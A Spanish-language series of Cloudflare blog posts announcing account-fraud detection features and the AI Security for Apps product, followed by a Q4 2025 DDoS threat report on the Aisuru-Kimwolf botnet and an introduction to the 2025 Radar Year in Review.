Los propietarios de sitios web necesitan herramientas para poner fin a los usos indebidos en sus sitios web, independientemente de quién los cometa.

Durante nuestra Semana aniversario en 2024, ofrecimos la detección de credenciales filtradas a todos los clientes, incluidos los que tienen un plan gratuito. Desde entonces, hemos incorporado identificadores de detección de apropiación de cuentas como parte de nuestra solución de gestión de bots para ayudarte a identificar los bots que atacan tus páginas de inicio de sesión. 

Ahora estamos combinando estas potentes herramientas con otras nuevas. La verificación de correos electrónicos temporales y la gestión de riesgos de correo electrónico te ayudan a aplicar las preferencias de seguridad para los usuarios que se registran con direcciones de correo temporales, una táctica habitual para crear cuentas falsas y abusar de las promociones, o cuyos correos se consideran de riesgo según los patrones de uso y la infraestructura. También nos alegra mucho presentar los Id. de usuario con hash, identificadores por dominio generados mediante el hash criptográfico de los nombres de usuario, que ofrecen a los clientes una mejor visión de la actividad sospechosa en las cuentas y una mayor capacidad para mitigar el tráfico potencialmente fraudulento, sin comprometer la privacidad del usuario final.

Las nuevas funciones que anunciamos hoy van más allá de la automatización, ya que detectan comportamientos abusivos e identidades de riesgo tanto entre usuarios humanos como entre bots. La protección contra el uso indebido de cuentas ya está disponible en acceso anticipado, y cualquier cliente de Bot Management del plan Enterprise puede usar estas funciones sin coste adicional durante un tiempo limitado, hasta que la prevención contra el fraude de Cloudflare esté disponible para todos a finales de este año. Si quieres saber más sobre esta función de acceso anticipado, regístrate aquí.

El umbral para cometer fraudes es peligrosamente bajo, sobre todo con la disponibilidad de enormes conjuntos de datos y el acceso a herramientas automatizadas que permiten cometer fraudes en cuentas a gran escala. Los propietarios de sitios web no solo se enfrentan a hackers individuales, sino a un fraude a gran escala. El año pasado, destacamos que el 41 % de los inicios de sesión en nuestra red se realiza con credenciales filtradas. Esta cifra no ha hecho más que aumentar tras la revelación de una base de datos con 16 000 millones de registros, y desde entonces han salido a la luz numerosas filtraciones de gran repercusión. 

Además, los usuarios reutilizan las contraseñas en varias plataformas, lo que significa que una sola filtración de hace años puede seguir dando acceso hoy en día a una cuenta de una tienda de gran valor o incluso a una cuenta bancaria. Nuestra función gratuita de comprobación de credenciales filtradas comprueba si una contraseña se ha filtrado en una fuga de datos conocida de otro servicio o aplicación en Internet. Se trata de un servicio de comprobación de credenciales que preserva la privacidad y que ayuda a proteger a nuestros usuarios de credenciales en riesgo, lo que significa que Cloudflare realiza estas comprobaciones sin acceder ni almacenar las contraseñas de los usuarios finales en texto sin formato. Las contraseñas se someten a un proceso de hash, es decir, se convierten en una cadena aleatoria de caracteres mediante un algoritmo criptográfico, con el fin de compararlas con una base de datos de credenciales filtradas. Si aún no has activado nuestra función comprobación de credenciales filtradas, hazlo ahora para proteger tus cuentas de piratas informáticos.

El acceso a una gran base de datos de credenciales filtradas solo es útil si un atacante puede probarlas rápidamente en muchos sitios web para identificar qué cuentas siguen siendo vulnerables debido a la reutilización de contraseñas. En nuestro análisis del Black Friday de 2024, observamos que más del 60 % del tráfico hacia las páginas de inicio de sesión de nuestra red era automatizado. Son muchos bots que intentan entrar.

Para ayudar a los clientes a proteger sus puntos de finales de acceso de inicio de sesión frente a los constantes ataques, hemos añadido detecciones específicas contra la apropiación de cuentas (ATO) para señalar los patrones de tráfico sospechosos. Esto forma parte de nuestro enfoque reciente en las detecciones por cliente, en las que proporcionamos detección de anomalías de comportamiento únicas para cada cliente de nuestra solución de gestión de bots. Ahora, los clientes del servicio de gestión de bots pueden detectar y mitigar los intentos de ataques de ATO en sus solicitudes de inicio de sesión directamente en el panel de análisis de seguridad.

^{En la pestaña de la izquierda del panel de control de análisis de seguridad, puedes ver y abordar los intentos de usurpación de cuentas.}

En la última semana, nuestras detecciones combinadas de ATO detectaron una media de 6900 millones de intentos de inicio de sesión sospechosos al día en toda nuestra red. Estas detecciones de ATO, junto con los muchos otros mecanismos de detección de nuestra solución de gestión de bots, crean una defensa por capas contra los ataques ATO y otros ataques maliciosos automatizados.

¿Distinguir la automatización o distinguir la intención y la identidad? Esa es la cuestión. Nuestra respuesta: sí y sí, ya que ambas son capas fundamentales para una estrategia de seguridad sólida. Los atacantes operan ahora a una escala que antes solo veían los servicios empresariales. Aprovechan filtraciones masivas de credenciales, utilizan redes de fraude gestionadas por personas para suplantar dispositivos y ubicaciones, y crean identidades sintéticas para mantener miles, incluso millones, de cuentas falsas con fines promocionales y para abusar de las plataformas. Una persona que utilice herramientas automatizadas podría estar vaciando cuentas, abusando de las promociones, cometiendo fraude en los pagos o todo lo anterior.

Además, la automatización está más al alcance que nunca, sobre todo ahora que los usuarios se están acostumbrando cada vez más a usar agentes de IA e incluso los navegadores "tradicionales" de toda la vida están incorporando capacidades agénticas de forma predeterminada. Ya sea un individuo que utiliza un agente de IA o una campaña de fraude coordinada, la amenaza no se reduce a un simple script — puede implicar una intención humana, combinada con una ejecución automatizada.

Echa un vistazo a estas situaciones que nos han contado nuestros clientes:

• Tenemos 1000 usuarios nuevos este mes, pero más de la mitad de ellos son identidades falsas que se benefician de una prueba gratuita y luego desaparecen.

• El atacante ha iniciado sesión con la contraseña correcta, así que, ¿cómo sé que no es el usuario real?

• Esta entidad actúa a un ritmo normal, y están vaciando las cuentas.

Estos problemas no se pueden resolver solo con la automatización, hay que comprobar también la autenticidad y la integridad. Esta es la carencia que nuestras soluciones especializadas en prevención del fraude buscan resolver.

Empecemos por analizar el primer punto en el que podría producirse un uso indebido de la cuenta: la creación de la cuenta. La creación de cuentas falsas o en masa es uno de los temas más recurrentes en los debates sobre fraudes en sitios web, ya que puede abrir la puerta a que los atacantes accedan a una aplicación, o incluso a todo un modelo de negocio. 

Cloudflare ofrece a sus clientes herramientas para detectar la creación de cuentas sospechosas desde el origen de dos maneras:

1. Comprobación de correos electrónicos temporales: detecta cuándo los usuarios se registran con direcciones de correo electrónico temporales, que suelen utilizarse para el spam y la creación de cuentas falsas. Estos servicios de correo electrónico temporal permiten a los atacantes crear miles de cuentas "únicas" sin necesidad de mantener una infraestructura real, sobre todo cuentas de correo temporales sin autenticación que ofrecen acceso inmediato sin necesidad de crear una cuenta, o alias de correo ilimitados y gratuitos. Los clientes pueden usar este campo binario cuando crean reglas para aplicar sus preferencias de seguridad, ya sea bloqueando directamente todos los correos electrónicos temporales o quizás solicitando una verificación a cualquiera que intente crear una cuenta con un correo electrónico temporal.

   

2. Riesgo del correo electrónico: Cloudflare analiza los patrones y la infraestructura del correo electrónico para establecer niveles de riesgo (bajo, medio, alto) que los clientes pueden utilizar en sus reglas de seguridad. Sabemos que no todas las direcciones de correo electrónico son iguales. Una dirección con el formato firstname.lastname@knowndomain.com presenta características de riesgo diferentes a las de xk7q9m2p@newdomain.xyz. Los niveles de riesgo por correo electrónico permiten a los clientes indicar su tolerancia al riesgo y a las complicaciones en el momento de crear la cuenta. 

Tanto la verificación de correo electrónico temporal como el riesgo de correo electrónico ya están disponibles en los análisis de seguridad y las reglas de seguridad, lo que permite a los propietarios de sitios web proteger el proceso de creación de cuentas. Estas detecciones abordan un problema fundamental. Cuando una cuenta ya está cometiendo abusos, ya es demasiado tarde. El propietario del sitio web ya ha pagado los costes de adquisición, el usuario fraudulento ha gastado los créditos promocionales y la solución del problema requiere una revisión manual. Para reducir el riesgo de los correos sospechosos, hay que añadir los controles adecuados en el momento del registro, que es cuando más importa.

Comprender los patrones de abuso requiere visibilidad, no solo de la red, sino también de la actividad de la cuenta. Tradicionalmente, la seguridad ha consistido en analizar direcciones IP y solicitudes HTTP aisladas para detectar actividades automatizadas, pero los propietarios de sitios web no solo se fijan en las señales de red, también tienen en cuenta a sus usuarios y las cuentas conocidas. Por eso, estamos ampliando nuestro conjunto de herramientas de mitigación para que coincida con la forma en que se estructuran realmente las aplicaciones, centrándonos en la detección de la actividad fraudulenta basada en el usuario.

Los atacantes pueden cambiar de dirección IP sin ningún problema para borrar sus huellas. Sin embargo, obligarlos a crear una y otra vez cuentas nuevas y fiables genera un montón de problemas, sobre todo si se suma a las medidas de seguridad para la creación de cuentas. Si miramos más allá de la capa de red y relacionamos las acciones fraudulentas con una cuenta concreta que ha sido vulnerada o está siendo utilizada de forma abusiva, podemos detectar comportamientos selectivos vinculados a un único individuo persistente y poner fin al abuso. De esta forma, estamos cambiando la estrategia de defensa para centrarla en las cuentas, en lugar de jugar a un juego de nunca acabar con direcciones IP rotativas y proxies residenciales. Esto significa que nuestros clientes pueden mitigar el comportamiento abusivo en función de la forma en que sus aplicaciones separan la identidad.

Para que los propietarios de sitios web puedan aprovechar esta función, Cloudflare lanza un Id. de usuario con hash que los clientes pueden utilizar en análisis de seguridad, reglas de seguridad y transformaciones gestionadas. Los Id. de usuario son versiones con hash criptográfico, específicas para cada dominio, de los valores del campo "nombre de usuario", y cada Id. de usuario es un identificador cifrado, único y estable que se genera para un nombre de usuario concreto en la aplicación de un cliente. Es importante destacar que Cloudflare no registra ni almacena el nombre de usuario real como parte de este servicio. Al igual que con la comprobación de credenciales filtradas y la detección de ATO, que identifican el tráfico de inicio de sesión y luego encriptan las credenciales para compararlas, damos prioridad a la privacidad del usuario final al tiempo que permitimos a nuestros clientes tomar medidas contra los comportamientos fraudulentos.

Con el acceso a los Id. de usuario con hash, los propietarios de sitios web pueden:

• Ver los principales usuarios: ¿qué cuentas tienen más actividad?

• Comprobar cuándo un usuario único inicia sesión desde un país en el que no suele hacerlo, ¡o desde varios países en un día!

• Mitigar el tráfico basándose en usuarios únicos, como bloquear a un usuario con historial de actividad sospechosa.

• Combinar campos para ver cuándo las cuentas están siendo objeto de ataque con credenciales robadas.

• Consultar qué patrones o señales de red están asociados a usuarios únicos.

^{Visualización ampliada de un único Id. de usuario cifrado en el panel de análisis de seguridad, que muestra los detalles de la actividad de ese usuario concreto, incluida su ubicación de inicio de sesión y su navegador.} 

Esta visibilidad a nivel de usuario transforma la forma en que los propietarios de sitios web pueden investigar y mitigar el tráfico. En lugar de examinar las solicitudes individuales de forma aislada, nuestros clientes pueden ver el panorama completo de cómo los atacantes se dirigen y se esconden entre los usuarios legítimos.

Si quieres saber más sobre esta función de acceso anticipado, regístrate aquí. Todos los clientes de Bot Management en el plan Enterprise pueden activar estas nuevas funciones de protección contra el uso indebido de cuentas desde hoy mismo, y nos encantaría hablar con todos y cada uno de los posibles clientes de Bot Management.

Si bien la detección de bots seguirá abordando la cuestión de la automatización y la intención, la detección de fraudes se centra en la cuestión de la autenticidad. Juntos, ofrecen a los propietarios de sitios web herramientas completas para luchar contra todo tipo de abusos en las cuentas. Este paquete forma parte de nuestra inversión continua para proteger todo el recorrido del usuario, desde la creación de la cuenta y el inicio de sesión hasta los procesos de pago seguros y la integridad de cada interacción.

Hemos añadido nuevas funciones, como la detección de temas personalizados, y ahora el servicio de detección de puntos finales que utilizan IA es gratuito para todos los clientes de Cloudflare — incluidos aquellos con planes gratuito, Pro y Business — para que todos puedan ver dónde está implementada la IA en sus aplicaciones conectadas a Internet.

También anunciamos una mayor colaboración con IBM, que ha elegido a Cloudflare para ofrecer seguridad basada en IA a sus clientes de servicios en la nube. Además, nos hemos asociado con Wiz para ofrecer a nuestros clientes comunes una visión global de su estado de seguridad basada en IA.

Las aplicaciones web tradicionales tienen operaciones definidas, como consultar el saldo bancario o hacer una transferencia. Puedes escribir reglas determinadas para proteger esas interacciones. 

Las aplicaciones y los agentes basados en IA son diferentes. Aceptan el lenguaje natural y generan respuestas impredecibles. No hay un conjunto fijo de operaciones para permitir o denegar, porque los datos de entrada y los resultados son probabilidades. Los atacantes pueden manipular los modelos de lenguaje de gran tamaño (LLM) para realizar acciones no autorizadas o filtrar datos confidenciales. La inyección de instrucciones, la divulgación de información confidencial y el consumo ilimitado son solo algunos de los riesgos que figuran en la lista de los 10 principales riesgos de OWASP para aplicaciones de LLM.

Estos riesgos aumentan a medida que las aplicaciones de IA se convierten en agentes. Cuando una herramienta de IA tiene acceso a operaciones en las que se procesan reembolsos, se modifican cuentas, se aplican descuentos o se accede a datos de clientes, una sola instrucción maliciosa se convierte inmediatamente en un incidente de seguridad.

Los clientes nos cuentan a qué se enfrentan. "La mayoría de los equipos de Newfold Digital están implementando sus propias medidas de seguridad para la IA generativa, pero todo el mundo está innovando tan rápido que, tarde o temprano, es inevitable que surjan algunas deficiencias", afirma Rick Radinger, arquitecto principal de sistemas en Newfold Digital, que opera Bluehost, HostGator y Domain.com.

Hemos creado AI Security for Apps para solucionarlo. Se integra con tus aplicaciones basadas en IA, tanto si utilizas un modelo de terceros como si alojas el tuyo propio, como parte del proxy inverso de Cloudflare. Te ayuda a (1) detectar aplicaciones basadas en IA en tu propiedad web, (2) detectar comportamientos maliciosos o fuera de la política en esos puntos finales, y (3) mitigar las amenazas mediante el conocido creador de reglas WAF.

Antes de que puedas proteger tus aplicaciones basadas en LLM, debes saber dónde se utilizan. A menudo, los equipos de seguridad nos comentan que no tienen una visión completa de las implementaciones de IA en sus aplicaciones, sobre todo ahora que el mercado de los LLM está en constante evolución y los desarrolladores van cambiando de modelos y proveedores. 

AI Security for Apps identifica automáticamente los puntos finales basados en LLM en tus propiedades web, independientemente de dónde estén alojados o de cuál sea el modelo. A partir de hoy, esta función es gratuita para todos los clientes de Cloudflare, incluidos aquellos con planes gratuito, Pro y Business. 

^{Página del panel de control de Cloudflare con los activos web, en la que se muestran dos puntos finales de ejemplo etiquetados como cf-llm}

La detección automática de estos puntos finales requiere algo más que la coincidencia de patrones de ruta comunes como /chat/completions. Muchas aplicaciones basadas en IA no tienen una interfaz de chat. Piensa, por ejemplo, en la búsqueda de productos, las herramientas de valoración inmobiliaria o los motores de recomendación. Hemos desarrollado un sistema de detección que analiza cómo se comportan los puntos finales, no cómo se llaman. Para identificar con confianza los puntos finales que utilizan IA, se requiere suficiente tráfico válido.

Los puntos finales que utilizan IA que se hayan detectado serán visibles en Seguridad → Activos web, etiquetados como cf-llm. Para los clientes con el plan gratuito, la detección de puntos finales se inicia la primera vez que accedes a la página Discovery. Para los clientes con un plan de pago, la detección se produce automáticamente en segundo plano de forma recurrente. Si se han detectado puntos finales basados en IA, puedes revisarlos inmediatamente.

Las detecciones de AI Security for Apps siguen el enfoque siempre activo para el tráfico a tus puntos finales que usan IA. Cada instrucción se ejecuta a través de varios módulos de detección para la inyección de instrucciones, la exposición de información de identificación personal y temas sensibles o tóxicos. Los resultados — ya sea que la instrucción fuera maliciosa o no — se adjuntan como metadatos que puedes usar en reglas WAF personalizadas para aplicar tus políticas. Buscamos constantemente formas de aprovechar nuestra red global, que registra el tráfico de aproximadamente el 20 % de la web, para detectar nuevos patrones de ataque en millones de sitios web antes de que lleguen al tuyo.

El producto incluye detección integrada de amenazas comunes: inyecciones de instrucciones, extracción de información de identificación personal y temas peligrosos. Sin embargo, cada empresa tiene su propia definición de lo que está prohibido. Una empresa de servicios financieros podría necesitar detectar conversaciones sobre valores específicos. Una empresa del sector sanitario podría necesitar marcar las conversaciones que traten sobre datos de pacientes. Un minorista puede querer saber cuándo los clientes preguntan por productos de la competencia.

La nueva función de temas personalizados te permite definir estas categorías. Tú especificas el tema, nosotros inspeccionamos la instrucción y emitimos una puntuación de relevancia que puedes utilizar para registrar, bloquear o gestionar como prefieras. Nuestro objetivo es crear una herramienta adaptable que se ajuste a tus necesidades.

^{Puntuación de relevancia de la Instrucción dentro de AI Security for Apps}

AI Security for Apps aplica medidas de seguridad antes de que las instrucciones no seguras puedan llegar a tu infraestructura. Para ejecutar las detecciones con precisión y proporcionar protección en tiempo real, primero debemos identificar las instrucciones dentro de la carga malintencionada de la solicitud. Las instrucciones pueden estar en cualquier lugar del cuerpo de una solicitud, y los diferentes proveedores de LLM estructuran sus API de forma diferente. OpenAI y la mayoría de los proveedores utilizan $.messages[*].content para las sugerencias de chat. La API por lotes de Anthropic integra las solicitudes dentro de $.requests[*].params.messages[*].content. Tu herramienta de valoración de propiedades personalizada podría utilizar $.property_description.

Desde el primer momento, admitimos los formatos estándar utilizados por OpenAI, Anthropic, Google Gemini, Mistral, Cohere, xAI, DeepSeek, entre otros. Cuando no podemos hacer coincidir un patrón conocido, aplicamos una postura segura por defecto y ejecutamos la detección en todo el cuerpo de la solicitud. Si la carga malintencionada contiene campos que son sensibles pero que no se envían directamente a un modelo de IA, esto puede provocar falsos positivos. Por ejemplo, un campo como $customer_name junto con la indicación real podría activar la detección de datos de identificación personal de forma innecesaria.

En breve, podrás definir tus propias expresiones JSONPath para indicarnos exactamente dónde encontrar la instrucción. De este modo, se reducirán los falsos positivos y las detecciones serán más precisas. También estamos desarrollando una función de aprendizaje de instrucciones que se adaptará automáticamente a la estructura de tu aplicación con el tiempo.

Una vez identificada y puntuada una amenaza, puedes bloquearla, registrarla o proporcionar respuestas personalizadas, utilizando el mismo motor de reglas WAF que ya utilizas para el resto de la seguridad de tus aplicaciones. La eficacia de la plataforma compartida de Cloudflare es que puedes combinar señales específicas de la IA con todo lo demás que sabemos sobre una solicitud, representado por cientos de campos disponibles en el WAF. Un intento de inyección de instrucciones es sospechoso. Pero que una dirección IP que ha estado investigando tu página de inicio de sesión intente inyectar código de forma inmediata, utilizando una huella digital del navegador relacionada con ataques anteriores y rotando a través de una red de bots, eso ya es otra historia. Las soluciones específicas que solo ven la capa de IA no pueden hacer estas conexiones.

Esta capa de seguridad unificada es exactamente lo que necesitan en Newfold Digital para detectar, etiquetar y proteger los puntos finales de IA, afirma Radinger: "Estamos deseando usarla en todos estos proyectos para que nos sirva de medida de seguridad".

AI Security for Apps también estará disponible a través del cada vez más amplio ecosistema de Cloudflare, incluida la integración con IBM Cloud. A través de IBM Cloud Internet Services (CIS), los usuarios finales ya pueden adquirir soluciones avanzadas de seguridad de aplicaciones y gestionarlas directamente a través de su cuenta de IBM Cloud. 

También nos asociamos con Wiz para conectar AI Security for Apps con Wiz AI Security, lo que ofrece a nuestros clientes comunes una visión unificada de su estado de seguridad en materia de IA, desde la detección de modelos y agentes en la nube hasta las medidas de protección en la capa de aplicaciones en el perímetro.

AI Security for Apps ya está disponible para los clientes Enterprise de Cloudflare. Ponte en contacto con tu equipo de cuenta para empezar, o comprueba cómo funciona el producto con una visita autoguiada.

Si tienes un plan gratuito, Pro o Business, puedes usar la detección de puntos finales de IA hoy mismo. Inicia sesión en tu panel de control y ve a Seguridad → Activos web para ver qué puntos finales hemos identificado. ¡Atentos! Pronto pondremos a disposición de los clientes de todos los planes todas las funciones de "AI Security for Apps".

Para obtener más información sobre la configuración, consulta nuestra documentación.

El cuarto trimestre de 2025 se ha caracterizado por un bombardeo sin precedentes lanzado por la botnet Aisuru-Kimwolf (la campaña de ataques DDoS "The Night Before Christmas"). Esta campaña contra clientes de Cloudflare, así como contra el panel de control y la infraestructura de Cloudflare, incluyó ataques DDoS HTTP hipervolumétricos que superaron los 200 millones de solicitudes por segundo, apenas unas semanas después de un ataque sin precedentes de 31,4 terabits por segundo (Tb/s).

1. Los ataques DDoS aumentaron un 121 % en 2025, alcanzando una media de 5376 ataques mitigados automáticamente cada hora.

2. En el último trimestre de 2025, Hong Kong escaló 12 posiciones, convirtiéndose en el segundo país del mundo que sufrió más ataques DDoS. El Reino Unido también subió 36 posiciones, lo que lo convierte en el 6.º país más afectado por los ataques.

3. Dispositivos Android TV infectados (como parte de la botnet Aisuru-Kimwolf) bombardearon la red de Cloudflare con ataques DDoS HTTP hipervolumétricos, y las empresas de telecomunicaciones fueron el sector más afectado.

En 2025, el número total de ataques DDoS se duplicó con creces, hasta la increíble cifra de 47,1 millones. Estos ataques han aumentado considerablemente en los últimos años: el número de ataques DDoS se ha disparado un 236 % entre 2023 y 2025.

En 2025, Cloudflare mitigó una media de 5376 ataques DDoS cada hora, de los cuales 3925 fueron ataques DDoS a la capa de red y 1451 fueron ataques DDoS HTTP. 

El crecimiento más importante se produjo en los ataques DDoS a la capa de red, que se triplicaron ampliamente en términos interanuales. Cloudflare mitigó 34,4 millones de ataques DDoS a la capa de red en 2025, en comparación con los 11,4 millones en 2024.

Una parte sustancial de los ataques a la capa de red (aproximadamente 13,5 millones) se lanzaron directamente contra la infraestructura global de Internet protegida por Cloudflare Magic Transit y la infraestructura de Cloudflare, como parte de una campaña de ataques DDoS de 18 días de duración en el primer trimestre de 2025. De estos ataques, 6,9 millones se lanzaron contra clientes de Magic Transit, mientras que los otros 6,6 millones tenían como objetivo directo a Cloudflare. 

Este ataque fue una campaña de ataques DDoS multivectorial que incluyó, por ejemplo, ataques de inundación SYN, ataques DDoS generados por Mirai y ataques de amplificación SSDP. Nuestros sistemas detectaron y mitigaron estos ataques de forma automática. De hecho, detectamos la campaña mientras preparábamos nuestro informe sobre las amenazas DDoS del primer trimestre de 2025, ¡un buen ejemplo de la eficacia de la mitigación de DDoS de Cloudflare!

En el último trimestre de 2025, el número de ataques DDoS creció un 31 % respecto al trimestre anterior y un 58 % respecto a 2024. Los ataques DDoS a la capa de red impulsaron ese crecimiento. En el cuarto trimestre de 2025, los ataques DDoS a la capa de red representaron el 78 % de todos los ataques DDoS. La cantidad de ataques DDoS HTTP no ha cambiado, pero su tamaño ha aumentado a un ritmo que no habíamos visto desde la campaña de ataques DDoS HTTP/2 Rapid Reset en 2023. Estas oleadas recientes han sido lanzadas por la botnet Aisuru-Kimwolf, de la que hablaremos en la siguiente sección. 

El viernes 19 de diciembre de 2025, la botnet Aisuru-Kimwolf comenzó a bombardear con ataques DDoS hipervolumétricos la infraestructura de Cloudflare y a clientes de Cloudflare. La novedad de esta campaña era su tamaño: la botnet utilizó ataques DDoS HTTP hipervolumétricos que superaron los 20 millones de solicitudes por segundo (Mrps).

La botnet Aisuru-Kimwolf es un conjunto enorme de dispositivos infectados con malware, principalmente dispositivos Android TV. Se estima que esta botnet está formada por entre 1 y 4 millones de hosts infectados. Es capaz de lanzar ataques DDoS que pueden paralizar la infraestructura crítica, bloquear la mayoría de las soluciones de protección contra DDoS heredadas basadas en la nube e incluso interrumpir la conectividad de países enteros.

Durante toda la campaña, los sistemas autónomos de protección contra DDoS de Cloudflare detectaron y mitigaron todos los ataques: 384 ataques que generaron gran cantidad de paquetes, 329 ataques que generaron gran cantidad de bits y 189 ataques que generaron gran cantidad de solicitudes, con un total de 902 ataques DDoS hipervolumétricos y un promedio de 53 ataques al día.

El tamaño medio de los ataques DDoS hipervolumétricos durante la campaña fue de 3000 millones de paquetes por segundo, 4 Tb/s y 54 millones de solicitudes por segundo. Las velocidades máximas registradas durante la campaña fueron de 9000 millones de paquetes por segundo, 24 Tb/s y 20 500 millones de solicitudes por segundo.

Para ponerlo en contexto, la escala de un ataque DDoS de 205 000 millones de solicitudes por segundo sería equivalente a que las poblaciones combinadas del Reino Unido, Alemania y España escribieran simultáneamente la dirección de un mismo sitio web y luego pulsaran Intro en el mismo segundo.

La campaña "The Night Before Christmas", aunque tuvo un gran impacto, representó solo una pequeña parte de los ataques DDoS hipervolumétricos que observamos durante el año.

A lo largo de 2025, Cloudflare observó un aumento continuo en los ataques DDoS hipervolumétricos. En el cuarto trimestre de 2025, los ataques hipervolumétricos aumentaron un 40 % en comparación con el trimestre anterior.

A medida que el número de ataques aumentaba en el transcurso de 2025, el tamaño de los ataques también aumentaba, con un crecimiento de más del 700 %, uno de los cuales alcanzó 31,4 Tb/s en un ataque DDoS que duró apenas 35 segundos. El siguiente gráfico muestra el rápido crecimiento del tamaño de los ataques DDoS observados y bloqueados por Cloudflare. Cada uno de estos ataques ha supuesto un récord mundial, es decir, ha sido el mayor ataque jamás divulgado públicamente por una empresa hasta ese momento.

Como todos los demás ataques, el ataque DDoS de 31,4 Tb/s fue detectado y mitigado automáticamente por la solución de protección contra DDoS autónoma de Cloudflare, que fue capaz de adaptarse y bloquear rápidamente botnets como Aisuru-Kimwolf.

La mayoría de los ataques DDoS hipervolumétricos tenían como objetivo clientes de Cloudflare del sector de las telecomunicaciones y los proveedores y operadores de servicios. Los clientes de Cloudflare del sector de los videojuegos y los clientes que prestan servicios de IA generativa también sufrieron ataques. Por último, la propia infraestructura de Cloudflare fue objetivo de varios vectores de ataque, como inundaciones HTTP, ataques DNS e inundaciones UDP.

Al analizar los ataques DDoS de todos los tamaños, el sector de las telecomunicaciones y los proveedores y operadores de servicios también fue el más afectado. Anteriormente, el sector de los servicios y la tecnología de la información era el que ostentaba ese desafortunado título.

El sector de las apuestas y casinos y el de los videojuegos ocuparon el tercer y cuarto lugar, respectivamente. Las mayores variaciones del trimestre en las principales 10 posiciones se han producido en los sectores del software informático y de los servicios empresariales, que han escalado varias posiciones. 

Los sectores más afectados se caracterizan por su función como una infraestructura crítica, como una red troncal central para otras empresas, o por las repercusiones financieras inmediatas y de alto riesgo que tendrían en caso de interrupciones del servicio y latencia.

El panorama de los ataques DDoS experimentó tanto una estabilidad predecible como cambios drásticos en los países más afectados por los ataques en todo el mundo. China, Alemania, Brasil y Estados Unidos fueron los cinco principales objetivos, lo que demuestra el reiterado interés que tienen estos países para los atacantes. 

Hong Kong ha tenido un cambio significativo, subiendo doce posiciones hasta la segunda posición. Sin embargo, el dato más destacado ha sido el meteórico ascenso del Reino Unido, que este trimestre ascendió 36 posiciones, por lo que pasa a ser el 6.º país más afectado por los ataques.  

Vietnam mantiene la séptima posición en la lista de países más afectados por los ataques, seguido de Azerbaiyán, la India y Singapur (en octava, novena y décima posición, respectivamente).

Bangladés ha desbancado a Indonesia como el país donde se originaron más ataques DDoS en el cuarto trimestre de 2025. Indonesia ha bajado al tercer puesto, tras ser durante un año el principal país de origen de ataques DDoS. Ecuador también ha escalado dos posiciones y ahora en el segundo país de origen de ataques DDoS.

En concreto, Argentina ha escalado veinte sorprendentes posiciones, y ahora es el cuarto mayor país de origen de ataques DDoS. Hong Kong ha subido tres puestos y ha ocupado el quinto lugar. Ucrania ocupa el sexto lugar, seguida de Vietnam, Taiwán, Singapur y Perú.

La lista de las 10 principales redes donde se originan los ataques parece una lista de gigantes de Internet, y revela una historia fascinante sobre la anatomía de los ataques DDoS modernos. El hilo conductor está claro: los ciberdelincuentes aprovechan la infraestructura de red más accesible y potente del mundo, principalmente grandes servicios accesibles desde Internet. 

Vemos que la mayoría de los ataques DDoS proceden de direcciones IP asociadas a plataformas de informática en la nube y a proveedores de infraestructura en la nube, como DigitalOcean (AS 14061), Microsoft (AS 8075), Tencent (AS 132203), Oracle (AS 31898) y Hetzner (AS 24940). Esto demuestra el fuerte vínculo entre las máquinas virtuales, de fácil suministro, y los ataques de gran volumen. A estos orígenes en la nube (muy concentrados en Estados Unidos) les sigue de cerca una presencia significativa de ataques procedentes de direcciones IP asociadas a proveedores de telecomunicaciones tradicionales. Estas empresas de telecomunicaciones, principalmente de la región de Asia-Pacífico (como Vietnam, China, Malasia y Taiwán), completan las restantes 10 principales posiciones.

Esta diversidad geográfica y organizativa confirma una realidad bidimensional de los ataques: si bien la gran escala de los orígenes que ocupan las primeras posiciones de la clasificación se suele originar en centros globales en la nube, el problema tiene realmente un alcance mundial y se enruta a través de las vías más críticas de Internet desde todo el mundo. En muchos ataques DDoS, vemos miles de ASN de origen distintos, lo que pone de manifiesto la distribución verdaderamente global de los nodos de la botnet.

Para ayudar a los proveedores de alojamiento, a las plataformas de informática en la nube y a los proveedores de servicios de Internet a identificar y eliminar las direcciones IP/cuentas abusivas que lanzan estos ataques, aprovechamos la perspectiva exclusiva que tiene Cloudflare de los ataques DDoS para proporcionar un canal gratuito sobre amenazas de botnets DDoS para proveedores de servicios. 

Más de 800 redes de todo el mundo ya se han registrado en este canal, y hemos observado una gran colaboración en toda la comunidad para desmantelar los nodos de botnets.

Los ataques DDoS están aumentando rápidamente en sofisticación y tamaño, superando cifras que antes eran imaginables. En este panorama de las amenazas en constante evolución, muchas organizaciones tienen dificultades para adaptarse. Las organizaciones que actualmente dependen de dispositivos de mitigación locales o de centros de filtrado bajo demanda pueden verse beneficiadas si reevalúan su estrategia de defensa.

Cloudflare se dedica a ofrecer protección contra DDoS gratuita e ilimitada a todos sus clientes, independientemente del tamaño, la duración o el volumen de los ataques, aprovechando su vasta red global y sus sistemas autónomos de mitigación de DDoS.

Movidos por la misión de ayudar a proteger Internet, Cloudforce One aprovecha la telemetría de la red global de Cloudflare, que protege aproximadamente el 20 % de la web, para impulsar la investigación de amenazas y la respuesta operativa, protegiendo los sistemas críticos de millones de organizaciones en todo el mundo.

Nuestra perspectiva es única, gracias a la red global de Cloudflare, que está presente en 330 ciudades de más de 125 países / regiones. Gestionamos una media de más de 81 millones de solicitudes HTTP por segundo, y más de 129 millones de solicitudes HTTP por segundo en los momentos de mayor actividad, en nombre de millones de propiedades web de clientes. Además, respondemos a aproximadamente 67 millones de consultas DNS (autoritativas + de resolución) por segundo. Cloudflare Radar utiliza los datos generados por estos servicios web y DNS, combinados con otros conjuntos de datos complementarios, para proporcionar información casi en tiempo real sobre los patrones y las tendencias relativas al tráfico, los bots, la seguridad, la conectividad y los DNS que observamos en Internet.

Nuestro Resumen del año en Radar aprovecha esta observabilidad para ofrecer una retrospectiva del año 2025 en lugar de una visión en tiempo real. Incorpora gráficos, tablas y mapas interactivos que te permitirán explorar y comparar tendencias y métricas seleccionadas año tras año y en todas las geografías, así como compartir e integrar gráficos del resumen del año. 

El informe está organizado en seis secciones: Tráfico, IA, Adopción y uso, Conectividad, Seguridad y Seguridad del correo electrónico, con datos que abarcan el periodo comprendido entre el 1 de enero y el 2 de diciembre de 2025. Para garantizar la coherencia, hemos mantenido las metodologías subyacentes sin cambios respecto a los cálculos de años anteriores. Este año también hemos incorporado varios conjuntos de datos nuevos, entre los que se incluyen múltiples métricas relacionadas con la IA, la actividad global de pruebas de velocidad y la progresión del tamaño hipervolumétrico de los ataques DDoS. En el micrositio se pueden consultar las tendencias de más de 200 países / regiones. Se excluyen las localidades más pequeñas o menos pobladas debido a la insuficiencia de datos. Algunas métricas solo se muestran a nivel global, y no se muestran si se selecciona un país o región. 

